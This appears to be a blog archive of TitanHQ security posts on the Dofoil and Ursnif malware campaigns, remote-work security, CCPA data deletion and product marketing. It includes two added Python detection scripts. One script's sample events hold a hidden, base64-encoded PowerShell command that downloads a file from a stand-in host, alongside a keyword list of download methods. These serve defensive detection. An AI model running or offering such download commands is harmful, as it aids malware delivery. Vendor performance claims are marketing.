Make sure all employees are aware of the procedures to follow for security incidents
Step up network monitoring and ideally use an intrusion detection solution and AI-based tool to identify anomalous user behavior that could be indicative of an insider threat or cyberattack in progress
A huge campaign distributing the Dofoil Trojan has been discovered by Microsoft. The campaign has already witnessed almost half a million PCs infected with the malware in less than 12 hours. The Dofoil Trojan is otherwise referred to as Smoke Loader – an installer that has been in operation for many years.
The Dofoil Trojan is a small application which once downloaded to a PC is capable of downloading other forms of malware. The Dofoil Trojan has been used in many campaigns since at least 2011 to download malware, with the latest campaign used to install cryptocurrency mining malware.
This was first noticed on March 6 when Windows Defender discovered almost 80,000 instances of the Trojan on PCs with the number rising rapidly to more than 400,000 in the next 12 hours. Several strains of the Dofoil Trojan were being used in the campaign which was mostly focusing on devices in Russia, Ukraine, and Turkey.
The cryptocurrency mining malware is being deployed to mine Electroneum coins on infected devices, although the malware can mine other cryptocurrencies.
Spotting the malware can be tricky as it uses process hollowing to create a new instance of an authentic Windows process for malicious purposes. In this case, the malware masquerades as a legitimate Windows binary, wuauclt.exe, to avoid detection. Explorer.exe is used to create a copy of the malware in the Roaming AppData folder, which is renamed ditereah.exe. The Windows registry is also altered to ensure persistence, with an existing entry changed to point to the malware copy. The malware communicates with its C2 server and is also capable of downloading additional malware variants onto an infected device.
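The three artifacts described above (a wuauclt.exe look-alike, an executable written into Roaming AppData by explorer.exe, and a registry value repointed at that copy) can be hunted for together. The following is an added example, not code from Microsoft or from this article; the event schema, the sample events, the registry key name and the assumption that Windows is installed in C:\Windows are all constructed for illustration.

```python
import ntpath
import re

# Assumption: Windows lives in C:\Windows; adjust for other installs.
SYSTEM32 = r"c:\windows\system32"
# System binary names worth checking for masquerading (the article names wuauclt.exe).
SYSTEM_BINARIES = {"wuauclt.exe"}

# Matches an .exe path anywhere under a user's Roaming AppData folder,
# with or without surrounding quotes or trailing arguments.
ROAMING_EXE = re.compile(
    r'[a-z]:\\[^"<>|]*?\\appdata\\roaming\\[^"<>|]*?\.exe(?![\w.])', re.I)

# Constructed, simplified endpoint events (not a real EDR or Sysmon schema).
SAMPLE_EVENTS = [
    {"host": "pc-01", "type": "process_create",
     "image": r"C:\Windows\System32\wuauclt.exe"},
    {"host": "pc-02", "type": "file_create",
     "image": r"C:\Windows\explorer.exe",
     "target": r"C:\Users\alice\AppData\Roaming\ditereah.exe"},
    {"host": "pc-02", "type": "registry_set",
     "image": r"C:\Windows\explorer.exe",
     "key": r"HKCU\Software\Example\ExistingEntry",  # placeholder key name
     "data": r"C:\Users\alice\AppData\Roaming\ditereah.exe"},
    {"host": "pc-02", "type": "process_create",
     "image": r"C:\Users\alice\AppData\Local\Temp\wuauclt.exe"},
    {"host": "pc-03", "type": "file_create",
     "image": r"C:\Windows\explorer.exe",
     "target": r"C:\Users\bob\Documents\report.docx"},
    {"host": "pc-03", "type": "registry_set",
     "image": r"C:\Program Files\Updater\setup.exe",
     "key": r"HKCU\Software\Example\Updater",        # placeholder key name
     "data": r'"C:\Users\bob\AppData\Roaming\Updater\app.exe" --silent'},
]


def roaming_exe(text):
    """Return the lower-cased Roaming AppData .exe path found in text, or None."""
    match = ROAMING_EXE.search(text)
    return match.group(0).lower() if match else None


def analyze(events):
    """Return (host, rule, detail) findings for the three behaviours."""
    findings = []
    dropped = set()  # (host, path) executables explorer.exe wrote into Roaming
    for ev in events:
        host, image = ev["host"], ev["image"]
        name = ntpath.basename(image).lower()
        if ev["type"] == "process_create":
            # A system binary name running from outside System32 is a look-alike.
            # A genuinely hollowed System32 image passes this check, which is
            # why the file and registry rules below are needed as well.
            if name in SYSTEM_BINARIES and ntpath.dirname(image).lower() != SYSTEM32:
                findings.append((host, "masquerade", image))
        elif ev["type"] == "file_create":
            path = roaming_exe(ev["target"])
            if path and name == "explorer.exe":
                dropped.add((host, path))
                findings.append((host, "explorer-dropped-exe", path))
        elif ev["type"] == "registry_set":
            path = roaming_exe(ev["data"])
            if path:
                # Higher confidence when the value points at a file we saw dropped.
                rule = ("persistence-to-dropped-file" if (host, path) in dropped
                        else "registry-points-to-roaming-exe")
                findings.append((host, rule, path))
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding)
```

The uncorrelated registry rule will also fire for legitimate software that installs per-user, so treat it as a lead to triage rather than an alert.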
While Microsoft was able to spot infections, what is not known at this stage is how the malware was downloaded on so many devices in such a short space of time. While the malware could possibly have been shared using spam email, another means of distribution is suspected. Microsoft notes that in many cases the malware is believed to have been spread using torrent files, which are used in P2P file sharing, often to obtain pirated movies, music, and software.
Microsoft has only made known the number of infections it has detected using Windows Defender. The company does not have visibility into devices that do not have the anti-malware software installed. The overall number of infections is therefore likely to be much higher. The 400,000+ infections are likely to be just the start of it.
Microsoft notes that its attempts to disrupt the operation did not just prevent devices from mining cryptocurrencies. Infection with the Dofoil Trojan allows the hackers to install any number of extra malicious payloads including more dangerous malware variants and ransomware.
The coronavirus pandemic has forced many workers into telecommuting and the number of people working from home has soared over the past two months. During this difficult time, IT security teams must take additional steps to protect remote employees from cybersecurity threats as cyberattacks on remote workers are increasing.
5 Steps to Take to Protect Remote Employees from Cybersecurity Threats
Businesses need to implement new measures to protect remote employees from cybersecurity threats. The number of employees now working from home makes cyberattacks on remote workers more likely. Already we have seen many campaigns targeting remote employees that aim to steal remote access credentials and infect devices with malware.
Vulnerabilities can easily be introduced when large numbers of employees work from home which can easily be exploited by cybercriminals to gain access to employees’ devices, cloud resources, and business networks. Here we provide 5 important steps to take to protect remote employees from cybersecurity threats during the coronavirus pandemic.
Use an Enterprise Grade VPN
It is important that remote workers only access work resources using a VPN; however, simply using a VPN does not make home working secure. Consumer-grade VPNs are very different from enterprise VPNs and should not be used, but even enterprise-grade VPNs are not necessarily secure and can have vulnerabilities that can easily be exploited by cybercriminals. The UK’s National Cyber Security Centre (NCSC) has warned that APT groups are conducting attacks exploiting unpatched vulnerabilities in VPN solutions from Pulse Secure, Fortinet, and Palo Alto Networks. These vulnerabilities were identified from April 2019 to July 2019, yet many businesses have not applied the patches. While patching can be difficult as VPNs are often in use 24/7, it is essential that patches are applied promptly. Malicious cyber actors are targeting VPNs and attacks are likely to continue to increase with more employees working from home.
Ensure All Devices Are Patched and Updated
Before any employee is allowed to work remotely, IT security teams must ensure that their laptops are fully up to date and are running the latest versions of operating systems and software. The Coronavirus pandemic is likely to last for several months, so policies and procedures must be developed to ensure that users’ devices are kept up to date. You must also ensure that endpoint protection solutions, antivirus software, and Windows update settings are configured to update automatically.
Enhance Email Security
The majority of cyberattacks start with a phishing email so it is essential to have an advanced email security solution in place. Businesses should not rely on the protection provided by Microsoft for Office 365 for blocking phishing and malware attacks. A third-party email security solution should be layered on top of the protections provided by Microsoft for Office 365. Layered defenses are essential to protect remote employees from cybersecurity threats.
SpamTitan provides enhanced protection from phishing, spear phishing, malware, and ransomware for Office 365 accounts, complementing and augmenting the protections provided by Microsoft. SpamTitan is cloud-based, so it can be easily applied and used to protect all email accounts, regardless of the platform you use.
Protect Against Web-Based Attacks
Email is the most likely way that cybercriminals will conduct cyberattacks on remote workers, but measures also need to be implemented to block web-based attacks such as drive-by malware downloads. CheckPoint reports there have been more than 16,000 COVID-19 and coronavirus themed domains registered since January and the number is growing at an incredible rate. These domains are 50% more likely to be malicious than other domains registered in the same period.
The easiest way to protect against web-based attacks is to use a cloud-based web filtering solution. WebTitan Cloud provides protection against web-based attacks by blocking access to malicious domains and websites that have a higher risk of hosting malware.
Provide Additional Training for Remote Employees
Research conducted by PurpleSec indicates 98% of all cyberattacks involve social engineering and Cofense research suggests more than 90% of cyberattacks start with a phishing email. It is therefore important for training to be provided to employees to help them identify social engineering and phishing attacks. Security awareness training for employees should be provided regularly and it is also useful to conduct phishing simulation exercises to identify employees that require further training. You also need to reinforce general IT cybersecurity best practices with remote workers to prevent them from engaging in risky behaviors.
Contact TitanHQ today for further information on protecting your remote employees against email- and web-based attacks.
During this unprecedented time of uncertainty, the health and safety of our employees, customers, partners and their families is one of our main focuses and concerns. Team TitanHQ are fully committed to supporting our partners and customers. The benefits from our email and web security products are even more relevant and important now.
Our fantastic team has jumped at the challenge with vigor and we have mobilized our workforce so that it’s business as usual over this unusual phase. We are taking advice from the government on best practice and have a task force in place to manage our progress.
Customers and partners can rest assured that support teams will continue to be available and product teams are working as normal. If you have any questions or concerns about products, or technical support, please contact us in the usual way. The support team has been trained to be aware of special customer concerns during this period and will escalate any question to the appropriate responsible person or department.
We are aware that this is a sensitive time and we will make sure to go the extra mile to make it easier for our customers. All of us at TitanHQ wish you good health and thank you for your continued support.
Under CCPA, Californians can request to have their personal data deleted, but there are CCPA data deletion exceptions you should be aware of. Not all personal data needs to be deleted.
Who Must Comply with CCPA?
The California Consumer Privacy Act gave Californians new rights over their personal data. From January 1, 2020, organizations that conduct business in the state of California are required to comply with CCPA if they have annual gross revenues of more than $25 million, handle the personal data of 50,000 or more consumers, or derive more than 50% of their annual revenue from the sale of personal information.
The CCPA Right to Delete
One of the new rights given to consumers is the right to have their personal data deleted. CCPA applies to personal data that identifies, relates to, describes, or can be associated with an individual or household, directly or indirectly.
When consumers exercise the right to delete, organizations are required to comply within 45 days, but there are CCPA data deletion exceptions. If data is not going to be deleted, the consumer must be informed without unreasonable delay and no later than 45 days after the request has been received. This timescale does not apply to data contained in archive or backup systems. The deletion of personal data stored in an archive or backup can be delayed until the next time the archive or backup is accessed or used.
When a data deletion request is received, an organization must take reasonable steps to verify that the request to delete data has been sent by the individual about whom the data relates. All personal data must then be deleted; however, there are 9 CCPA data deletion exceptions.
CCPA Data Deletion Exceptions
Businesses are not required by law to delete data that is required to perform 9 specific activities:
Data does not need to be deleted if it is required to complete the transaction for which the data was collected or to provide goods or services that have been requested by the consumer. Data does not need to be deleted if it is “reasonably anticipated within the context of a business’s ongoing business relationship with the consumer, or otherwise perform a contract between the business and the consumer.”
If personal data, such as data contained in server logs, is needed to detect security incidents, to protect against malicious, deceptive, fraudulent or illegal activity, or to allow prosecution of the persons responsible for those activities, it should not be deleted.
Personal data does not need to be deleted if it is needed to debug or identify and repair errors that impair existing functionality.
While the CCPA helps protect the privacy of consumers, it is secondary to free speech. Personal data does not need to be deleted in order to allow the exercise of free speech, and to ensure the right of another consumer to exercise his or her right of free speech, or to exercise another right provided for by law.
Personal data does not need to be deleted if it is required to ensure compliance with the California Electronic Communications Privacy Act (CalECPA).
Personal data is excepted from deletion if it is required to comply with other legal obligations, such as data retention laws.
Research Conducted in the Public Interest
Personal information of consumers that is used for research conducted in the public interest does not need to be deleted. This includes personal data that is collected and maintained for peer-reviewed, scientific, historical, or statistical research in the public interest if deletion of the data would seriously impair the achievement of the research, provided the consumer has previously provided informed consent for their personal data to be used for research.
Expected Internal Uses
Data is exempt from deletion requests if it is required to enable solely internal uses reasonably aligned with the expectations of the consumer based on the consumer’s relationship with the business.
Other Internal Uses
Personal data does not need to be deleted if it is required for other internal uses which, in a lawful manner, are compatible with the context in which the consumer provided their personal data.
Enforcement of CCPA Compliance
The California Attorney General is tasked with enforcing compliance with CCPA and has the authority to issue financial penalties for noncompliance up to $2,500 per violation or $7,500 for an intentional violation. Californian consumers are permitted to take legal action against organizations over data breaches and can claim damages between $100 and $750 per data breach.
In this post we explain the CCPA requirements for businesses and the most important elements of the California Consumer Privacy Act.
What Businesses Must Comply with CCPA?
Unlike the EU’s General Data Protection Regulation (GDPR), which applies to all businesses that collect or process the data of EU residents, CCPA only applies to for-profit businesses that meet certain criteria. Any business that meets one or more of the criteria below is required to comply with CCPA.
Has annual revenues of more than $25 million
Collects information on 50,000 or more California households or residents each year
Earns 50% or more of its annual revenue from the sale of the consumer data of California residents
These requirements may be updated or expanded to include a wider range of companies. Make sure you keep up to date with any changes to CCPA if you collect or process the data of U.S. consumers.
It is not just companies with a base in California that are required to comply with CCPA. Any company that does business in California or collects or processes the data of California residents is required to comply with CCPA.
What are the CCPA Consumer Rights?
CCPA was introduced to give California residents greater control over their personal data.
Consumer rights under CCPA include:
Right to know what personal data is being collected
Right to know what personal data is held by a company
Right to know how personal data is being used by a company
Restriction of the use and sale of personal data of minors (under 13) without parental consent
Restriction of the use and sale of personal data of minors (13-16) without direct consent
Right to delete all personal data held by a company
Right to opt-out of having personal data sold
Right to non-discrimination, in terms of price or services, if CCPA rights are exercised
Right to take legal action against companies for privacy violations and the failure to honor CCPA rights
Requests from consumers must be confirmed within 10 days and honored within 45 days
Key CCPA Requirements for Businesses
Businesses must ensure consumers are notified about the collection of their personal data before data is collected and consumers should be given the option of opting out of the collection of their data or the sale of their data. Personal data should only be collected for specific and legitimate purposes.
Maintain procedures to respond to requests from consumers to access their data, delete their data, and opt out of the sale of their personal information. Procedures must also be developed and maintained relating to the collection and use of the personal information of minors.
Businesses must offer consumers two methods to request data and arrange to have their data deleted. One method that is mandatory is a toll-free telephone number. If a business primarily operates online, a web-based method should be offered.
Any member of staff that handles consumer data must be trained on the requirements of CCPA. Oversight of compliance must be delegated to an individual or team.
Businesses must verify the identity of the consumer prior to providing their data or deleting data after a request is received from a consumer.
CCPA does not go as far as GDPR in terms of data security requirements for businesses. CCPA does not stipulate the security measures that must be implemented to protect consumer data, but it does require businesses to have adequate protections in place to safeguard consumer data, including measures to prevent unauthorized data access. Bear in mind that penalties can be imposed for data breaches and consumers can take legal action over the exposure of their data if the company holding that data has been negligent. Consumer lawsuits can require payment of up to $750 per consumer in the event of a CCPA violation and it is not necessary to provide proof of harm. A large data breach could therefore prove very costly.
How TitanHQ Can Help with CCPA Compliance
TitanHQ offers three solutions that can help with CCPA compliance: SpamTitan Email Security, WebTitan DNS Filtering, and ArcTitan Email Archiving.
SpamTitan is a powerful email security solution that provides industry leading protection against spam and the leading causes of data breaches – phishing attacks and malware infections.
WebTitan is a DNS filtering solution that provides an additional level of protection against phishing attacks and malware. WebTitan blocks attempts by network users to access malicious websites such as those used for phishing or malware delivery, thus helping to prevent the exposure of consumer data.
ArcTitan is an email archiving solution that helps businesses keep email data protected, meet email retention requirements, and quickly find and recover emails when dealing with customer complaints or demonstrating compliance, and find and delete the data of consumers if a request to have data deleted is received.
TitanHQ and Pax8 have formed a new strategic partnership that has seen TitanHQ’s cloud-based email security and web security solutions added to the Pax8 ecosystem and offered to managed service provider partners.
Pax8 is a leading cloud distributor, providing 100% cloud-based productivity, infrastructure, continuity, and security solutions to its partners. The company is a born in the cloud distributor connecting the channel ecosystem to its award-winning transactional cloud marketplace.
Pax8 is a regular recipient of industry awards and has been named as CRN’s Coolest Cloud Vendor, Best in Show at NextGen for two years in a row, as well as having collected two consecutive Best in Show awards at XChange conferences. Pax8 is also enjoying impressive growth, having risen from position 68 in the Inc. 5000 list of the fastest growing companies in 2018 to position 60 in 2019.
The successes are due to the ease with which its partners can find, purchase, and manage cloud solutions and get the most out of their cloud journeys. One of the key areas driving growth in the cloud is cybersecurity. Through Pax8, MSPs can easily find, deploy, and manage cloud-based cybersecurity solutions to protect their own networks and those of their clients.
Pax8 offers cybersecurity solutions to protect the entire attack surface but the partnership with TitanHQ allows Pax8 to better serve MSPs serving the SMB market. Pax8 carefully vets the vendors it works with and only selects companies that have developed powerful, channel-friendly solutions. TitanHQ was therefore a natural fit, being the leading provider of cloud-based email and web security solutions to MSPs serving the SMB market.
TitanHQ has developed its cybersecurity solutions to meet the needs of managed service providers and gives them the features and benefits that are often lacking in many SMB-focused security products. TitanHQ’s email and web security offerings can be hosted within an MSP’s own environment and they can be supplied in white-label form ready for MSP branding. MSPs benefit from highly competitive pricing, a fully transparent pricing policy, easy integration into their existing systems through TitanHQ APIs, no minimum users or monthly targets, generous margins, and industry-leading technical support. SpamTitan Email Security and WebTitan DNS filtering are also easy to implement and use and have a low management overhead.
For these reasons the solutions are much loved by end users and consistently achieve high ratings on software review sites such as G2 Crowd Report, Gartner Peer Insights, and Capterra.
“Our partners are excited about the addition of TitanHQ and the ability to protect their clients’ businesses by blocking malware, phishing, ransomware, and links to malicious websites from emails,” said Ryan Walsh, chief channel officer at Pax8.
“I am delighted to partner with the Pax8 team,” said TitanHQ CEO Ronan Kavanagh. “Their focus and dedication to the MSP community is completely aligned with ours at TitanHQ, and we look forward to delivering our integrated solutions to their partners and customers.”
A new strain of the Ursnif banking Trojan has been identified and the actors behind the latest campaign have implemented a new tactic to spread the malware more quickly.
The Ursnif banking Trojan is one of the most commonly seen Trojans. As is the case with other banking Trojans, the purpose of the Ursnif Trojan is to steal credentials such as logins to banking websites, corporate bank details, and credit card information. The stolen credentials are then used to complete financial transactions. It is not unusual for accounts to be drained before the transactions are discovered, by which time the funds have cleared, have been withdrawn, and the criminal’s account has been closed. Recovering the stolen funds may not be possible.
Infection will result in the malware stealing a wide range of sensitive data, capturing credentials as they are typed into the browser. The Ursnif banking Trojan also captures screenshots of the infected device and logs keystrokes. All of that information is silently sent to the hacker’s C2 server.
Banking Trojans can be delivered in a number of ways. They are often hosted on websites where they are downloaded in drive-by attacks. Traffic is sent to the malicious websites using malvertising campaigns or spam emails containing hyperlinks. Legitimate websites are compromised using brute force methods, and exploit kits are installed on the sites that attack people who have failed to keep their software up to date. In many cases, the malware is distributed using spam email, hidden in attachments.
Spam email has previously been used to spread the Ursnif banking Trojan, and the most recent campaign is no different in that regard. However, the latest campaign uses a new tactic to increase the chance of infection and spread infections more quickly and widely. Financial institutions have been the main target of this banking Trojan, but with this most recent attack method the attacks are far more widespread.
Infection will see the user’s contact list scanned and spear phishing emails sent to each of the user’s contacts. Since the spear phishing emails come from a trusted email account, the chance of the emails being opened is significantly increased. Simply opening the email will not lead to infection. For that to take place, the recipient must open the email attachment. Again, since it has come from a trusted person, that is more likely.
The actors behind this latest Ursnif banking Trojan campaign have another trick to increase trust and ensure their payload is delivered. The spear phishing emails contain message threads from past communications. The email looks like a response to a previous email and includes details of past communications.
A short line of text is included in an attempt to get the recipient to open the email attachment – a Word document including a malicious macro. That macro must be enabled before it can run (unless macros have been set to run automatically), but it will not run until the Word document is closed. When the macro is enabled, it initiates PowerShell commands that download the Ursnif Trojan, which then starts logging activity on the infected device and sends further spear phishing emails to the new victim’s contacts.
This is not an original tactic, but it is new to Ursnif – and it is likely to see infections spread much more swiftly. Additionally, the malware incorporates a number of additional tactics to hamper detection, allowing information to be stolen and bank accounts emptied before infection is discovered – the Trojan even erases itself once it has run.
Malware is always changing, and new tactics are constantly created to increase the likelihood of infection. The most recent campaign shows just how important it is to block email threats before they reach end users’ inboxes.
If you use an advanced spam filter like SpamTitan, malicious emails can be blocked to prevent them from reaching end users’ inboxes, greatly reducing the danger posed by malware infections.
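The infection chain described above (a Word macro launching PowerShell to download the payload) leaves a process-lineage trace that defenders can alert on. The following is an added example, not part of the original article or any TitanHQ product: it scans process-creation events for PowerShell with an Office ancestor and decodes any encoded command before checking for download activity. The JSON-lines export, the Sysmon-style field names, and the sample events are constructed assumptions.

```python
import base64
import json
import re

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
DOWNLOAD_HINTS = ("downloadstring", "downloadfile", "invoke-webrequest",
                  "net.webclient", "start-bitstransfer")
# A flag followed by a long base64-looking argument, e.g. "-enc SQBuAHYA..."
FLAG_ARG = re.compile(r"\s-(\w+)\s+([A-Za-z0-9+/=]{16,})")


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def expanded_command(cmdline):
    """Command line plus any decoded -EncodedCommand payload, lower-cased."""
    text = cmdline
    for flag, arg in FLAG_ARG.findall(cmdline):
        # PowerShell accepts abbreviated forms of -EncodedCommand such as -e and -enc.
        if "encodedcommand".startswith(flag.lower()):
            try:
                text += " " + base64.b64decode(arg).decode("utf-16-le", "replace")
            except ValueError:  # not valid base64: keep the raw text only
                pass
    return text.lower()


def office_spawned_powershell(lines, max_hops=4):
    """Flag PowerShell processes that have an Office application as an ancestor."""
    procs, alerts = {}, []
    for line in lines:
        ev = json.loads(line)
        procs[ev["ProcessGuid"]] = ev  # GUIDs avoid confusion from PID reuse
        if basename(ev["Image"]) not in POWERSHELL:
            continue
        chain = [basename(ev["Image"])]
        parent = procs.get(ev["ParentProcessGuid"])
        while parent and len(chain) <= max_hops:
            chain.append(basename(parent["Image"]))
            if chain[-1] in OFFICE:
                text = expanded_command(ev["CommandLine"])
                hits = [h for h in DOWNLOAD_HINTS if h in text]
                alerts.append({"host": ev["Computer"], "chain": chain,
                               "indicators": hits,
                               "severity": "high" if hits else "medium"})
                break
            parent = procs.get(parent["ParentProcessGuid"])
    return alerts


def make_event(host, guid, parent, image, cmdline):
    """Build one constructed process-creation record as a JSON line."""
    return json.dumps({"Computer": host, "ProcessGuid": guid,
                       "ParentProcessGuid": parent, "Image": image,
                       "CommandLine": cmdline})


# Constructed sample data: hosts, GUIDs, paths and the URL are all made up.
WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_PAYLOAD = "Invoke-WebRequest http://files.example.invalid/update -OutFile $env:TEMP\\u.bin"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    make_event("WS-01", "{a1}", "{e0}", WORD, WORD + r' /n "C:\Users\kim\Downloads\Request.doc"'),
    make_event("WS-01", "{a2}", "{a1}", CMD, "cmd.exe /c powershell -nop -w hidden -enc " + SAMPLE_ENCODED),
    make_event("WS-01", "{a3}", "{a2}", PS, "powershell -nop -w hidden -enc " + SAMPLE_ENCODED),
    # Administrator running a script from a shell: no Office ancestor, not flagged.
    make_event("WS-01", "{a4}", "{e0}", PS, r"powershell.exe -File C:\Scripts\inventory.ps1"),
    make_event("WS-02", "{b1}", "{e1}", WORD, WORD),
    make_event("WS-02", "{b2}", "{b1}", PS, "powershell.exe -c Get-Date"),
]

if __name__ == "__main__":
    for alert in office_spawned_powershell(SAMPLE_EVENTS):
        print(alert)
```

Any Office-to-PowerShell lineage is reported at medium severity; download indicators in the (decoded) command line raise it to high.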
In the rush to buy Christmas gifts online, security awareness is often disregarded and hackers are waiting to take advantage. Hidden among the countless emails sent by retailers to inform past customers of the most recent special offers and deals are a great many holiday season email scams. To an untrained eye, these scam emails seem to be no different from those sent by authentic retailers. Then there are the phishing websites that record details and credit card numbers and websites hosting exploit kits that silently install malware. It is a dangerous time to be using the Internet for shopping.
However, if you are careful, you can avoid holiday season email scams, phishing websites, and malware this Christmas. To help you avoid strife, we have gathered some tips for staying safe this festive season.
Guidelines to Stay Safe This Holiday Season
In the days before Christmas there will be scams aplenty. To stay safe online, remember the following:
Carefully check the URL of websites before parting with your card details every time
Spoofed websites often look just like the genuine sites that they mimic. They use the same background and style, the same imagery, and the same branding as retail sites. The only thing not the same is the URL. Before filling in your card details or parting with any sensitive data, review the URL of the site and make sure you are not on a spoofed website.
Never permit retailers to hold your card details for future transactions
It is a service that makes for swift purchases. Sure, it is a pain to have to enter your card details each time you want to buy something, but by taking an extra minute to enter your card details each time you will reduce the chance of your account being emptied by scammers. Cyberattacks on retailers are common, and SQL injection attacks can give hackers access to retailers’ websites – and a treasure trove of stored credit card numbers.
Crazy deals are normally just that
You may find out that you have won a PlayStation 4 or the latest iPhone in a competition. While it is possible that you may have won a prize, it is doubtful that this will happen if you haven’t actually entered a prize draw. Similarly, if you are offered a 50% discount on a purchase through email, there is a high probability that it is a scam. Scammers take advantage of the fact that everyone loves a deal, and never more so than during the holiday period.
If you purchase online, use your credit card
Avoid the holiday season crowds and buy presents online, but use your credit card for purchases instead of a debit card. If you have been caught in a holiday season scam or your debit card details are stolen from a retailer, it is highly unlikely that you will be able to recover stolen funds. With a credit card, you have better security measures and getting a refund is much more likely.
Never visit HTTP sites
Websites secured by the SSL protocol are safer. If a website address begins with HTTPS it means the connection between your browser and the website is encrypted. It makes it much more difficult for sensitive data to be intercepted. Never hand over your credit card details on a website that does not begin with HTTPS.
Carefully check order and delivery confirmations
If you order over the Internet, you will no doubt want to look over the status of your order and find out when your purchases will be delivered. If you are sent an email with tracking information or a delivery confirmation, treat the email as potentially dangerous. Always go to the delivery company’s website by entering the URL into your browser, rather than visiting links sent through email. Fake delivery confirmations and parcel tracking links are common. The links can bring you to phishing websites and sites that install malware, while email attachments often contain malware and ransomware installers.
Holiday season is hectic, but be careful online
One of the chief reasons holiday season email scams are successful is that people are in a hurry and do not take the time to read emails carefully and check that attachments and links are authentic. Scammers take advantage of busy individuals. Look over the destination URL of any email link before you click. Take time to consider things before taking any action online or responding to an email request.
Have different passwords for different websites
You may decide to purchase all of your Christmas gifts on Amazon, but if you need to sign up for a number of different sites, never use the same password for these websites. Password reuse is one of the main ways that hackers can capture access details for your social media networks and bank accounts. If there is a data breach at one retailer and your password is stolen, hackers will attempt to use that password on lots of other platforms.
Holiday season gift card scams are very common, and this year is no exception. Many gift card-themed scams were tracked during Thanksgiving weekend that offered free or cheap gift cards to lure online shoppers into publicly sharing their credit card information.
Everyone is a fan of a bargain and the offer of something for nothing may be too tempting. Many people are taken in by these scams which is why threat actors switch to gift card scams around Holiday season.
Consumers can be tricked into parting with credit card information, but companies are also at risk. Many of these campaigns are designed to obtain access to login credentials or are used to install malware. If an end user responds to such a scam during their work day, it is their employer that will likely pay the ultimate price.
This year has seen many businesses hit by gift card scam campaigns. Figures released by Proofpoint indicate that out of the organizations that have been targeted with email fraud attacks, almost 16% had experienced a gift card-themed attack, up from 11% in Q2, 2018.
This year has also seen a heightened risk due to business email compromise (BEC) style tactics, with emails appearing to have been sent from within a company. The emails say that they have been sent from the CEO (or another executive) and request that accounts and administration staff purchase gift cards for clients, or ask for gift cards to be bought in order to use them for charitable donations.
To cut the risk from gift card scams and other holiday-themed phishing emails, firms need to see to it that they have powerful spam filtering technology in place to block the emails at source and prevent them from being sent to employee inboxes.
Advanced Anti-Phishing Security for Office 365
Many companies use Office 365, but even Microsoft’s anti-phishing security measures see many phishing emails slip through the security systems, especially at businesses that included the advanced phishing protection subscription. Even with the advanced anti-phishing measures, emails still make it past Microsoft’s filters.
If you wish to block these malicious messages, an advanced third-party spam filter is necessary. SpamTitan has been designed to work side by side with Office 365 to improve protection against malware, phishing emails, and more complex phishing attacks.
SpamTitan can deal with more than 99.9% of spam email, while dual antivirus engines prevent 100% of known malware. What really sets SpamTitan apart from other software is the level of protection it offers against new threats. A combination of Bayesian analysis, greylisting, machine learning, and heuristics helps to identify zero-day attacks, which often get by Office 365 defenses.
If you want to enhance security from email-based attacks and reduce the amount of spam and malicious messages that are arriving in Office 365 inboxes, contact TitanHQ and book a product demonstration to see SpamTitan working.
There is a cheaper option than Cisco OpenDNS that provides total protection against web-based threats. If you are currently using OpenDNS or have yet to configure a web filtering solution, you can find out about this powerful web filtering solution in a December 5, 2018 webinar.
Cybersecurity solutions can be implemented to secure the network perimeter, but employees are often careless online, which can lead to costly data breaches. The online activities of employees can easily lead to malware, ransomware, and viruses being installed. Staff may also respond to malicious adverts (malvertising) or visit phishing websites where they are relieved of their login details.
Addressing malware infections, solving ransomware attacks, and resolving phishing-related breaches have a negative impact on the business and the resultant data breaches can be incredibly expensive. Due to this, the threat from web-based attacks cannot be disregarded.
Luckily, there is an easy solution that offers protection against web-based threats by carefully managing the web content that employees can access: A DNS-based web filter.
DNS-based web filtering requires no hardware acquisitions and no software installations. Within around 5 minutes, a business will be able to control employee internet access and block web-based dangers. Some DNS-based web filters such as OpenDNS can be costly, but there is a more cost-effective alternative to Cisco OpenDNS.
TitanHQ and Celestix Networks will be conducting a joint webinar to introduce an alternative to Cisco OpenDNS – The WebTitan-powered solution, Celestix WebFilter Cloud.
Celestix will be joined by Rocco Donnino, TitanHQ EVP of Strategic Alliances, and Senior Sales Engineer Derek Higgins, who will outline how the DNS-based filtering technology offers total protection from web-based dangers at a fraction of the cost of OpenDNS.
The webinar is at 10:00 AM US Pacific Time on Wednesday December 5, 2018.
Version 7.06 of SpamTitan was released on November 12, 2019. The latest version includes several important security updates to address known issues with the reporting engine. The security patches and ISO/OVA images can now be downloaded and have been made available for several packages including OpenSSH, OpenSSL, Sudo, PHP, and ClamAV.
The update has been released for both the cloud-based anti-spam service, which has already been updated for all users, and TitanHQ’s SpamTitan software solution, SpamTitan Gateway. Software users have had the new release downloaded onto their appliances but administrators will need to log in to their UI to apply the update and security patches.
The latest release is accompanied by a new RESTapi, which is one of the most important enhancements in SpamTitan v7.06. The RESTapi has been released to make it easier for clients and partners to implement integrations.
“Implementing the RESTapi and encouraging API adoption are vital steps in our partnership expansion plans,” said TitanHQ CEO, Ronan Kavanagh. “After experiencing 30% growth in 2019, TitanHQ expects these product enhancements and new features to make 2020 another record-breaking year.”
Users should not experience any problems upgrading to the latest SpamTitan version, but if any issues are experienced or for advice on upgrading, contact the customer service team on email@example.com. Technical specifications of the new RESTapi can be found on this link.
In this post we propose an ideal Cisco Umbrella alternative that you can implement at a fraction of the cost of Cisco Umbrella, yet still have excellent protection from web-based threats and precision internet content control for your workforce.
WebTitan Cloud is the leading Cisco Umbrella alternative for SMBs and Managed Service Providers (MSP) that serve the SMB market. WebTitan Cloud is, in many respects, a direct swap out for Cisco Umbrella, and one that will save you a small fortune on DNS filtering costs.
Before we cover the cost of WebTitan versus Cisco Umbrella, it is worthwhile taking a moment to explain why DNS filtering is now an essential part of the security stack and why you need to add this additional layer of security if you are not already using a DNS filter.
Why is a DNS Filter Necessary?
You will no doubt be aware that the internet can be a dangerous place. As an IT professional or SMB owner, you need to make sure that your employees do not venture into areas of the internet that could cause your business harm.
Even general web browsing can pose a risk of a malware infection or ransomware download, and employees can easily be tricked into visiting phishing web pages where credentials are harvested. These are very real threats that need to be mitigated.
